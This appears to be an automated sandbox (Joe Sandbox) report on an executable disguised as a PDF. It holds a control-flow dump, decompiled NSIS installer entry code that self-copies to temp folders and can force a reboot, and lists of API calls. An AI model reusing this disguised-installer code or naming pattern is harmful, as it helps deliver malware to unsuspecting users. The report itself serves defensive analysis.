4994 10001d7a GlobalFree GlobalFree GlobalFree 4995 10001d97 4994->4995 5007 10001de1 4994->5007 4996 100020ee 4995->4996 5005 10001dac 4995->5005 4995->5007 4998 10002110 GetModuleHandleW 4996->4998 4996->5007 4997 10001c1d GlobalAlloc 4999 10001b47 4997->4999 5001 10002121 LoadLibraryW 4998->5001 5002 10002136 4998->5002 4999->4994 4999->4997 5000 10001c86 GlobalFree 4999->5000 5003 10001c68 lstrcpyW 4999->5003 5006 10001c72 lstrcpyW 4999->5006 4999->5007 5009 10002048 4999->5009 5017 10001cc4 4999->5017 5018 10001f37 GlobalFree 4999->5018 5020 1000122c 2 API calls 4999->5020 5082 1000121b GlobalAlloc 4999->5082 5000->4999 5001->5002 5001->5007 5083 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5002->5083 5003->5006 5005->5007 5079 1000122c 5005->5079 5006->4999 5007->4951 5008 10002188 5008->5007 5010 10002195 lstrlenW 5008->5010 5009->5007 5016 10002090 lstrcpyW 5009->5016 5084 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5010->5084 5014 10002148 5014->5008 5021 10002172 GetProcAddress 5014->5021 5015 100021af 5015->5007 5016->5007 5017->4999 5077 1000158f GlobalSize GlobalAlloc 5017->5077 5018->4999 5020->4999 5021->5008 5028 100022e8 5022->5028 5023 1000122c GlobalAlloc lstrcpynW 5023->5028 5025 10002415 GlobalFree 5025->5028 5030 100017ae 5025->5030 5026 100023d3 lstrlenW 5026->5025 5032 100023de 5026->5032 5027 100023ba GlobalAlloc CLSIDFromString 5027->5025 5028->5023 5028->5025 5028->5026 5028->5027 5029 1000238f GlobalAlloc WideCharToMultiByte 5028->5029 5086 100012ba 5028->5086 5029->5025 5030->4959 5030->4962 5030->4966 5032->5025 5090 100025d9 5032->5090 5035 100028b6 5033->5035 5034 1000295b WriteFile 5036 10002979 5034->5036 5035->5034 5037 10002a75 5036->5037 5038 10002a6a GetLastError 5036->5038 5037->4959 5038->5037 5040 10002296 5039->5040 5041 100017a7 5039->5041 5040->5041 5042 100022a8 GlobalAlloc 5040->5042 5041->4954 5042->5040 5044 10002661 5043->5044 5045 100026b2 GlobalAlloc 5044->5045 5046 100026c5 5044->5046 5048 100026d4 5045->5048 5047 100026ca GlobalSize 5046->5047 5046->5048 5047->5048 5048->4979 5050 10002b6a 5049->5050 5051 10002baa GlobalFree 5050->5051 5093 1000121b GlobalAlloc 5052->5093 5054 10002530 StringFromGUID2 5060 100024b3 5054->5060 5055 10002541 lstrcpynW 5055->5060 5056 1000250b MultiByteToWideChar 5056->5060 5057 10002571 GlobalFree 5057->5060 5058 10002554 wsprintfW 5058->5060 5059 100025ac GlobalFree 5059->4967 5060->5054 5060->5055 5060->5056 5060->5057 5060->5058 5060->5059 5061 10001272 2 API calls 5060->5061 5094 100012e1 5060->5094 5061->5060 5098 1000121b GlobalAlloc 5063->5098 5065 100015ba 5066 100015c7 lstrcpyW 5065->5066 5068 100015e1 5065->5068 5069 100015fb 5066->5069 5068->5069 5070 100015e6 wsprintfW 5068->5070 5069->4982 5070->5069 5072 10001861 5071->5072 5073 1000247a 5071->5073 5072->4987 5072->4988 5073->5072 5074 10002496 GlobalFree 5073->5074 5074->5073 5075->4992 5076->4999 5078 100015ad 5077->5078 5078->5017 5085 1000121b GlobalAlloc 5079->5085 5081 1000123b lstrcpynW 5081->5007 5082->4999 5083->5014 5084->5015 5085->5081 5087 100012c1 5086->5087 5088 1000122c 2 API calls 5087->5088 5089 100012df 5088->5089 5089->5028 5091 100025e7 VirtualAlloc 5090->5091 5092 1000263d 5090->5092 5091->5092 5092->5032 5093->5060 5095 100012ea 5094->5095 5096 1000130c 5094->5096 5095->5096 5097 100012f0 lstrcpyW 5095->5097 5096->5060 5097->5096 5098->5065 5804 401d33 5805 402c31 18 API calls 5804->5805 5806 401d44 SetWindowLongW 5805->5806 5807 402adb 5806->5807 5808 401db3 GetDC 5809 402c31 18 API calls 5808->5809 5810 401dc5 GetDeviceCaps MulDiv ReleaseDC 5809->5810 5811 402c31 18 API calls 5810->5811 5812 401df6 5811->5812 5813 406234 18 API calls 5812->5813 5814 401e33 CreateFontIndirectW 5813->5814 5815 4025a8 5814->5815 5099 401735 5100 402c53 18 API calls 5099->5100 5101 40173c SearchPathW 5100->5101 5102 401757 5101->5102 5816 402ab6 SendMessageW 5817 402ad0 InvalidateRect 5816->5817 5818 402adb 5816->5818 5817->5818 5819 402837 5820 40283d 5819->5820 5821 402845 FindClose 5820->5821 5822 402adb 5820->5822 5821->5822 5823 4014b8 5824 4014be 5823->5824 5825 401389 2 API calls 5824->5825 5826 4014c6 5825->5826 5834 4029be 5835 402c31 18 API calls 5834->5835 5836 4029c4 5835->5836 5837 402a04 5836->5837 5838 4029eb 5836->5838 5839 4028a1 5836->5839 5841 402a1e 5837->5841 5842 402a0e 5837->5842 5840 4029f0 5838->5840 5847 402a01 5838->5847 5848 406212 lstrcpynW 5840->5848 5844 406234 18 API calls 5841->5844 5843 402c31 18 API calls 5842->5843 5843->5847 5844->5847 5847->5839 5849 406159 wsprintfW 5847->5849 5848->5839 5849->5839 5850 10002a7f 5851 10002a97 5850->5851 5852 1000158f 2 API calls 5851->5852 5853 10002ab2 5852->5853

                                                                      Executed Functions

                                                                      Function 0040344A Relevance: 89.7, APIs: 33, Strings: 18, Instructions: 401stringfilecomCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 40344a-40347d SetErrorMode GetVersion 1 403490 0->1 2 40347f-403487 call 4065ec 0->2 4 403495-4034a9 call 40657c lstrlenA 1->4 2->1 7 403489 2->7 9 4034ab-40351f call 4065ec * 2 #17 OleInitialize SHGetFileInfoW call 406212 GetCommandLineW call 406212 GetModuleHandleW 4->9 7->1 18 403521-403528 9->18 19 403529-403543 call 405bf3 CharNextW 9->19 18->19 22 403549-40354f 19->22 23 40365a-403674 GetTempPathW call 403419 19->23 25 403551-403556 22->25 26 403558-40355c 22->26 30 403676-403694 GetWindowsDirectoryW lstrcatW call 403419 23->30 31 4036cc-4036e6 DeleteFileW call 402ed5 23->31 25->25 25->26 28 403563-403567 26->28 29 40355e-403562 26->29 32 403626-403633 call 405bf3 28->32 33 40356d-403573 28->33 29->28 30->31 48 403696-4036c6 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403419 30->48 51 403797-4037a7 call 403969 OleUninitialize 31->51 52 4036ec-4036f2 31->52 49 403635-403636 32->49 50 403637-40363d 32->50 37 403575-40357d 33->37 38 40358e-4035c7 33->38 44 403584 37->44 45 40357f-403582 37->45 39 4035e4-40361e 38->39 40 4035c9-4035ce 38->40 39->32 47 403620-403624 39->47 40->39 46 4035d0-4035d8 40->46 44->38 45->38 45->44 54 4035da-4035dd 46->54 55 4035df 46->55 47->32 56 403645-403653 call 406212 47->56 48->31 48->51 49->50 50->22 58 403643 50->58 68 4038cd-4038d3 51->68 69 4037ad-4037bd call 405957 ExitProcess 51->69 59 403787-40378e call 403a5b 52->59 60 4036f8-403703 call 405bf3 52->60 54->39 54->55 55->39 63 403658 56->63 58->63 67 403793 59->67 71 403751-40375b 60->71 72 403705-40373a 60->72 63->23 67->51 74 403951-403959 68->74 75 4038d5-4038eb GetCurrentProcess OpenProcessToken 68->75 79 4037c3-4037d7 call 4058da lstrcatW 71->79 80 40375d-40376b call 405cce 71->80 76 40373c-403740 72->76 77 40395b 74->77 78 40395f-403963 ExitProcess 74->78 82 403921-40392f call 4065ec 75->82 83 4038ed-40391b LookupPrivilegeValueW AdjustTokenPrivileges 75->83 84 403742-403747 76->84 85 403749-40374d 76->85 77->78 94 4037e4-4037fe lstrcatW lstrcmpiW 79->94 95 4037d9-4037df lstrcatW 79->95 80->51 93 40376d-403783 call 406212 * 2 80->93 96 403931-40393b 82->96 97 40393d-403948 ExitWindowsEx 82->97 83->82 84->85 89 40374f 84->89 85->76 85->89 89->71 93->59 94->51 100 403800-403803 94->100 95->94 96->97 98 40394a-40394c call 40140b 96->98 97->74 97->98 98->74 104 403805-40380a call 405840 100->104 105 40380c call 4058bd 100->105 109 403811-40381f SetCurrentDirectoryW 104->109 105->109 112 403821-403827 call 406212 109->112 113 40382c-403855 call 406212 109->113 112->113 117 40385a-403876 call 406234 DeleteFileW 113->117 120 4038b7-4038bf 117->120 121 403878-403888 CopyFileW 117->121 120->117 122 4038c1-4038c8 call 4060b3 120->122 121->120 123 40388a-4038aa call 4060b3 call 406234 call 4058f2 121->123 122->51 123->120 132 4038ac-4038b3 CloseHandle 123->132 132->120
                                                                      C-Code - Quality: 82%
                                                                      			_entry_() {
				intOrPtr _t54;
				WCHAR* _t58;
				char* _t61;
				void* _t64;
				void* _t66;
				int _t68;
				int _t70;
				int _t73;
				intOrPtr* _t74;
				int _t75;
				int _t77;
				void* _t101;
				signed int _t118;
				void* _t121;
				void* _t126;
				intOrPtr _t145;
				intOrPtr _t146;
				intOrPtr* _t147;
				int _t149;
				void* _t152;
				int _t153;
				signed int _t157;
				signed int _t162;
				signed int _t167;
				void* _t169;
				void* _t171;
				int* _t173;
				signed int _t179;
				signed int _t182;
				CHAR* _t183;
				WCHAR* _t184;
				void* _t190;
				char* _t191;
				void* _t194;
				void* _t195;
				void* _t238;

				_t169 = 0x20;
				_t149 = 0;
				 *(_t195 + 0x14) = 0;
				 *(_t195 + 0x10) = L"Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t195 + 0x1c) = 0;
				SetErrorMode(0x8001); // executed
				if(GetVersion() != 6) {
					_t147 = E004065EC(0);
					if(_t147 != 0) {
						 *_t147(0xc00);
					}
				}
				_t183 = "UXTHEME";
				do {
					E0040657C(_t183); // executed
					_t183 =  &(_t183[lstrlenA(_t183) + 1]);
				} while ( *_t183 != 0);
				E004065EC(9);
				_t54 = E004065EC(7);
				 *0x42a244 = _t54;
				__imp__#17(_t190);
				__imp__OleInitialize(_t149); // executed
				 *0x42a2f8 = _t54;
				SHGetFileInfoW(0x4216e8, _t149, _t195 + 0x34, 0x2b4, _t149); // executed
				E00406212(0x429240, L"NSIS Error");
				_t58 = GetCommandLineW();
				_t191 = L"\"C:\\Users\\Arthur\\Desktop\\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe\"";
				E00406212(_t191, _t58);
				 *0x42a240 = GetModuleHandleW(_t149);
				_t61 = _t191;
				if(L"\"C:\\Users\\Arthur\\Desktop\\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe\"" == 0x22) {
					_t61 =  &M00435002;
					_t169 = 0x22;
				}
				_t153 = CharNextW(E00405BF3(_t61, _t169));
				 *(_t195 + 0x18) = _t153;
				_t64 =  *_t153;
				if(_t64 == _t149) {
					L30:
					_t184 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
					GetTempPathW(0x400, _t184);
					_t66 = E00403419(_t153, 0);
					_t220 = _t66;
					if(_t66 != 0) {
						L33:
						DeleteFileW(L"1033"); // executed
						_t68 = E00402ED5(_t222,  *(_t195 + 0x1c)); // executed
						 *(_t195 + 0x10) = _t68;
						if(_t68 != _t149) {
							L45:
							E00403969();
							__imp__OleUninitialize();
							_t234 =  *(_t195 + 0x10) - _t149;
							if( *(_t195 + 0x10) == _t149) {
								__eflags =  *0x42a2d4 - _t149;
								if( *0x42a2d4 == _t149) {
									L69:
									_t70 =  *0x42a2ec;
									__eflags = _t70 - 0xffffffff;
									if(_t70 != 0xffffffff) {
										 *(_t195 + 0x10) = _t70;
									}
									ExitProcess( *(_t195 + 0x10));
								}
								_t73 = OpenProcessToken(GetCurrentProcess(), 0x28, _t195 + 0x14);
								__eflags = _t73;
								if(_t73 != 0) {
									LookupPrivilegeValueW(_t149, L"SeShutdownPrivilege", _t195 + 0x20);
									 *(_t195 + 0x34) = 1;
									 *(_t195 + 0x40) = 2;
									AdjustTokenPrivileges( *(_t195 + 0x28), _t149, _t195 + 0x24, _t149, _t149, _t149);
								}
								_t74 = E004065EC(4);
								__eflags = _t74 - _t149;
								if(_t74 == _t149) {
									L67:
									_t75 = ExitWindowsEx(2, 0x80040002);
									__eflags = _t75;
									if(_t75 != 0) {
										goto L69;
									}
									goto L68;
								} else {
									_t77 =  *_t74(_t149, _t149, _t149, 0x25, 0x80040002);
									__eflags = _t77;
									if(_t77 == 0) {
										L68:
										E0040140B(9);
										goto L69;
									}
									goto L67;
								}
							}
							E00405957( *(_t195 + 0x10), 0x200010);
							ExitProcess(2);
						}
						if( *0x42a25c == _t149) {
							L44:
							 *0x42a2ec =  *0x42a2ec | 0xffffffff;
							 *(_t195 + 0x14) = E00403A5B( *0x42a2ec);
							goto L45;
						}
						_t173 = E00405BF3(_t191, _t149);
						if(_t173 < _t191) {
							L41:
							_t231 = _t173 - _t191;
							 *(_t195 + 0x10) = L"Error launching installer";
							if(_t173 < _t191) {
								_t171 = E004058DA(_t234);
								lstrcatW(_t184, L"~nsu");
								if(_t171 != _t149) {
									lstrcatW(_t184, "A");
								}
								lstrcatW(_t184, L".tmp");
								_t193 = L"C:\\Users\\Arthur\\Desktop";
								if(lstrcmpiW(_t184, L"C:\\Users\\Arthur\\Desktop") != 0) {
									_push(_t184);
									if(_t171 == _t149) {
										E004058BD();
									} else {
										E00405840();
									}
									SetCurrentDirectoryW(_t184);
									_t238 = L"C:\\Users\\Arthur\\AppData\\Local\\Deskriptiv155\\Hjertere" - _t149; // 0x43
									if(_t238 == 0) {
										E00406212(L"C:\\Users\\Arthur\\AppData\\Local\\Deskriptiv155\\Hjertere", _t193);
									}
									E00406212(0x42b000,  *(_t195 + 0x18));
									_t154 = "A" & 0x0000ffff;
									 *0x42b800 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
									_t194 = 0x1a;
									do {
										E00406234(_t149, 0x420ee8, _t184, 0x420ee8,  *((intOrPtr*)( *0x42a250 + 0x120)));
										DeleteFileW(0x420ee8);
										if( *(_t195 + 0x10) != _t149 && CopyFileW(L"C:\\Users\\Arthur\\Desktop\\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe", 0x420ee8, ?str?) != 0) {
											E004060B3(_t154, 0x420ee8, _t149);
											E00406234(_t149, 0x420ee8, _t184, 0x420ee8,  *((intOrPtr*)( *0x42a250 + 0x124)));
											_t101 = E004058F2(0x420ee8);
											if(_t101 != _t149) {
												CloseHandle(_t101);
												 *(_t195 + 0x10) = _t149;
											}
										}
										 *0x42b800 =  *0x42b800 + 1;
										_t194 = _t194 - 1;
									} while (_t194 != 0);
									E004060B3(_t154, _t184, _t149);
								}
								goto L45;
							}
							 *_t173 = _t149;
							_t174 =  &(_t173[2]);
							if(E00405CCE(_t231,  &(_t173[2])) == 0) {
								goto L45;
							}
							E00406212(L"C:\\Users\\Arthur\\AppData\\Local\\Deskriptiv155\\Hjertere", _t174);
							E00406212(L"C:\\Users\\Arthur\\AppData\\Local\\Deskriptiv155\\Hjertere", _t174);
							 *(_t195 + 0x10) = _t149;
							goto L44;
						}
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_t157 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
						_t118 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t162 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
						while( *_t173 != _t157 || _t173[1] != _t118) {
							_t173 = _t173;
							if(_t173 >= _t191) {
								continue;
							}
							break;
						}
						_t149 = 0;
						goto L41;
					}
					GetWindowsDirectoryW(_t184, 0x3fb);
					lstrcatW(_t184, L"\\Temp");
					_t121 = E00403419(_t153, _t220);
					_t221 = _t121;
					if(_t121 != 0) {
						goto L33;
					}
					GetTempPathW(0x3fc, _t184);
					lstrcatW(_t184, L"Low");
					SetEnvironmentVariableW(L"TEMP", _t184);
					SetEnvironmentVariableW(L"TMP", _t184);
					_t126 = E00403419(_t153, _t221);
					_t222 = _t126;
					if(_t126 == 0) {
						goto L45;
					}
					goto L33;
				} else {
					goto L8;
				}
				do {
					L8:
					_t152 = 0x20;
					if(_t64 != _t152) {
						L10:
						if( *_t153 == 0x22) {
							_t153 = _t153 + 2;
							_t152 = 0x22;
						}
						if( *_t153 != 0x2f) {
							goto L24;
						} else {
							_t153 = _t153 + 2;
							if( *_t153 == 0x53) {
								_t146 =  *((intOrPtr*)(_t153 + 2));
								if(_t146 == 0x20 || _t146 == 0) {
									 *0x42a2e0 = 1;
								}
							}
							asm("cdq");
							asm("cdq");
							_t167 = L"NCRC" & 0x0000ffff;
							asm("cdq");
							_t179 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t167;
							if( *_t153 == (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t167) &&  *((intOrPtr*)(_t153 + 4)) == _t179) {
								_t145 =  *((intOrPtr*)(_t153 + 8));
								if(_t145 == 0x20 || _t145 == 0) {
									 *(_t195 + 0x1c) =  *(_t195 + 0x1c) | 0x00000004;
								}
							}
							asm("cdq");
							asm("cdq");
							_t162 = L" /D=" & 0x0000ffff;
							asm("cdq");
							_t182 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t162;
							if( *(_t153 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t162) ||  *_t153 != _t182) {
								goto L24;
							} else {
								 *(_t153 - 4) =  *(_t153 - 4) & 0x00000000;
								__eflags = _t153;
								E00406212(L"C:\\Users\\Arthur\\AppData\\Local\\Deskriptiv155\\Hjertere", _t153);
								L29:
								_t149 = 0;
								goto L30;
							}
						}
					} else {
						goto L9;
					}
					do {
						L9:
						_t153 = _t153 + 2;
					} while ( *_t153 == _t152);
					goto L10;
					L24:
					_t153 = E00405BF3(_t153, _t152);
					if( *_t153 == 0x22) {
						_t153 = _t153 + 2;
					}
					_t64 =  *_t153;
				} while (_t64 != 0);
				goto L29;
			}







































                                                                      0x00403455
                                                                      0x00403456
                                                                      0x0040345d
                                                                      0x00403461
                                                                      0x00403469
                                                                      0x0040346d
                                                                      0x0040347d
                                                                      0x00403480
                                                                      0x00403487
                                                                      0x0040348e
                                                                      0x0040348e
                                                                      0x00403487
                                                                      0x00403490
                                                                      0x00403495
                                                                      0x00403496
                                                                      0x004034a2
                                                                      0x004034a6
                                                                      0x004034ae
                                                                      0x004034b5
                                                                      0x004034ba
                                                                      0x004034bf
                                                                      0x004034c6
                                                                      0x004034cc
                                                                      0x004034e2
                                                                      0x004034f2
                                                                      0x004034f7
                                                                      0x004034fd
                                                                      0x00403504
                                                                      0x00403518
                                                                      0x0040351d
                                                                      0x0040351f
                                                                      0x00403523
                                                                      0x00403528
                                                                      0x00403528
                                                                      0x00403537
                                                                      0x00403539
                                                                      0x0040353d
                                                                      0x00403543
                                                                      0x0040365a
                                                                      0x00403660
                                                                      0x0040366b
                                                                      0x0040366d
                                                                      0x00403672
                                                                      0x00403674
                                                                      0x004036cc
                                                                      0x004036d1
                                                                      0x004036db
                                                                      0x004036e2
                                                                      0x004036e6
                                                                      0x00403797
                                                                      0x00403797
                                                                      0x0040379c
                                                                      0x004037a2
                                                                      0x004037a7
                                                                      0x004038cd
                                                                      0x004038d3
                                                                      0x00403951
                                                                      0x00403951
                                                                      0x00403956
                                                                      0x00403959
                                                                      0x0040395b
                                                                      0x0040395b
                                                                      0x00403963
                                                                      0x00403963
                                                                      0x004038e3
                                                                      0x004038e9
                                                                      0x004038eb
                                                                      0x004038f8
                                                                      0x0040390b
                                                                      0x00403913
                                                                      0x0040391b
                                                                      0x0040391b
                                                                      0x00403923
                                                                      0x00403928
                                                                      0x0040392f
                                                                      0x0040393d
                                                                      0x00403940
                                                                      0x00403946
                                                                      0x00403948
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403931
                                                                      0x00403937
                                                                      0x00403939
                                                                      0x0040393b
                                                                      0x0040394a
                                                                      0x0040394c
                                                                      0x00000000
                                                                      0x0040394c
                                                                      0x00000000
                                                                      0x0040393b
                                                                      0x0040392f
                                                                      0x004037b6
                                                                      0x004037bd
                                                                      0x004037bd
                                                                      0x004036f2
                                                                      0x00403787
                                                                      0x00403787
                                                                      0x00403793
                                                                      0x00000000
                                                                      0x00403793
                                                                      0x004036ff
                                                                      0x00403703
                                                                      0x00403751
                                                                      0x00403751
                                                                      0x00403753
                                                                      0x0040375b
                                                                      0x004037ce
                                                                      0x004037d0
                                                                      0x004037d7
                                                                      0x004037df
                                                                      0x004037df
                                                                      0x004037ea
                                                                      0x004037ef
                                                                      0x004037fe
                                                                      0x00403802
                                                                      0x00403803
                                                                      0x0040380c
                                                                      0x00403805
                                                                      0x00403805
                                                                      0x00403805
                                                                      0x00403812
                                                                      0x00403818
                                                                      0x0040381f
                                                                      0x00403827
                                                                      0x00403827
                                                                      0x00403835
                                                                      0x00403841
                                                                      0x0040384f
                                                                      0x00403854
                                                                      0x0040385a
                                                                      0x00403866
                                                                      0x0040386c
                                                                      0x00403876
                                                                      0x0040388c
                                                                      0x0040389d
                                                                      0x004038a3
                                                                      0x004038aa
                                                                      0x004038ad
                                                                      0x004038b3
                                                                      0x004038b3
                                                                      0x004038aa
                                                                      0x004038b7
                                                                      0x004038be
                                                                      0x004038be
                                                                      0x004038c3
                                                                      0x004038c3
                                                                      0x00000000
                                                                      0x004037fe
                                                                      0x0040375d
                                                                      0x00403760
                                                                      0x0040376b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403773
                                                                      0x0040377e
                                                                      0x00403783
                                                                      0x00000000
                                                                      0x00403783
                                                                      0x0040370c
                                                                      0x00403724
                                                                      0x00403735
                                                                      0x00403736
                                                                      0x0040373a
                                                                      0x0040373c
                                                                      0x0040374a
                                                                      0x0040374d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040374d
                                                                      0x0040374f
                                                                      0x00000000
                                                                      0x0040374f
                                                                      0x0040367c
                                                                      0x00403688
                                                                      0x0040368d
                                                                      0x00403692
                                                                      0x00403694
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040369c
                                                                      0x004036a4
                                                                      0x004036b5
                                                                      0x004036bd
                                                                      0x004036bf
                                                                      0x004036c4
                                                                      0x004036c6
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403549
                                                                      0x00403549
                                                                      0x0040354b
                                                                      0x0040354f
                                                                      0x00403558
                                                                      0x0040355c
                                                                      0x00403561
                                                                      0x00403562
                                                                      0x00403562
                                                                      0x00403567
                                                                      0x00000000
                                                                      0x0040356d
                                                                      0x0040356e
                                                                      0x00403573
                                                                      0x00403575
                                                                      0x0040357d
                                                                      0x00403584
                                                                      0x00403584
                                                                      0x0040357d
                                                                      0x00403595
                                                                      0x004035a8
                                                                      0x004035a9
                                                                      0x004035be
                                                                      0x004035c3
                                                                      0x004035c7
                                                                      0x004035d0
                                                                      0x004035d8
                                                                      0x004035df
                                                                      0x004035df
                                                                      0x004035d8
                                                                      0x004035eb
                                                                      0x004035fe
                                                                      0x004035ff
                                                                      0x00403614
                                                                      0x0040361a
                                                                      0x0040361e
                                                                      0x00000000
                                                                      0x00403645
                                                                      0x00403645
                                                                      0x0040364a
                                                                      0x00403653
                                                                      0x00403658
                                                                      0x00403658
                                                                      0x00000000
                                                                      0x00403658
                                                                      0x0040361e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403551
                                                                      0x00403551
                                                                      0x00403552
                                                                      0x00403553
                                                                      0x00000000
                                                                      0x00403626
                                                                      0x0040362d
                                                                      0x00403633
                                                                      0x00403636
                                                                      0x00403636
                                                                      0x00403637
                                                                      0x0040363a
                                                                      0x00000000

                                                                      APIs
                                                                      • SetErrorMode.KERNELBASE ref: 0040346D
                                                                      • GetVersion.KERNEL32 ref: 00403473
                                                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040349C
                                                                      • #17.COMCTL32(00000007,00000009), ref: 004034BF
                                                                      • OleInitialize.OLE32(00000000), ref: 004034C6
                                                                      • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 004034E2
                                                                      • GetCommandLineW.KERNEL32(00429240,NSIS Error), ref: 004034F7
                                                                      • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe",00000000), ref: 0040350A
                                                                      • CharNextW.USER32(00000000,"C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe",00000020), ref: 00403531
                                                                        • Part of subcall function 004065EC: GetModuleHandleA.KERNEL32(?,00000020,?,004034B3,00000009), ref: 004065FE
                                                                        • Part of subcall function 004065EC: GetProcAddress.KERNEL32(00000000,?), ref: 00406619
                                                                      • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 0040366B
                                                                      • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040367C
                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403688
                                                                      • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040369C
                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004036A4
                                                                      • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004036B5
                                                                      • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004036BD
                                                                      • DeleteFileW.KERNELBASE(1033), ref: 004036D1
                                                                        • Part of subcall function 00406212: lstrcpynW.KERNEL32(?,?,00000400,004034F7,00429240,NSIS Error), ref: 0040621F
                                                                      • OleUninitialize.OLE32(?), ref: 0040379C
                                                                      • ExitProcess.KERNEL32 ref: 004037BD
                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 004037D0
                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 004037DF
                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 004037EA
                                                                      • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe",00000000,?), ref: 004037F6
                                                                      • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403812
                                                                      • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,?), ref: 0040386C
                                                                      • CopyFileW.KERNEL32(C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe,00420EE8,?), ref: 00403880
                                                                      • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000), ref: 004038AD
                                                                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 004038DC
                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 004038E3
                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004038F8
                                                                      • AdjustTokenPrivileges.ADVAPI32 ref: 0040391B
                                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 00403940
                                                                      • ExitProcess.KERNEL32 ref: 00403963
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
